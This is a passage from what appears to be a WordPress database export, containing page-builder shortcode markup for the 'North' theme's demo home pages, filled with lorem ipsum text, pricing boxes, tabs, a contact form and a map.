animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709776984{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506097407{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dots_dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409759263341{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384b99d-fe262c01-1978\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384b99d-fe262c01-1978\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6b99d-fe262c01-1978\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home13','','publish','open','open','','home13','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=978',0,'page','',0),(1928,1,'2014-09-12 17:13:49','2014-09-12 17:13:49','[vc_row css=\".vc_custom_1410736550778{padding-top: 0px !important;padding-bottom: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/09/rain-bg.jpg?id=1039) !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" bg_rain=\"yes\"][vc_column width=\"1/1\"][vntd_fullscreen_slider text_static=\"We are North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" button1_label=\"Purchase\" button1_url=\"#\" custom_links=\"Welcome to North,We are Designers,We Love to Design\" text_dynamic=\"We create awesome themes!,We are creative Designers,We love to Design\" button2_label=\"Read More\" button2_url=\"#about\" animated=\"no\" bg_overlay=\"dark2\" buttons_color=\"dark\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply. [list icon=\"caret-right\" color=\"dark\" background=\"yes\"] [li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li] [li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li] [li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li] [/list] Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709770765{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709776984{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506097407{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dots_dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409759263341{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384b99d-fe262c01-1978\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384b99d-fe262c01-1978\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6b99d-fe262c01-1978\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" 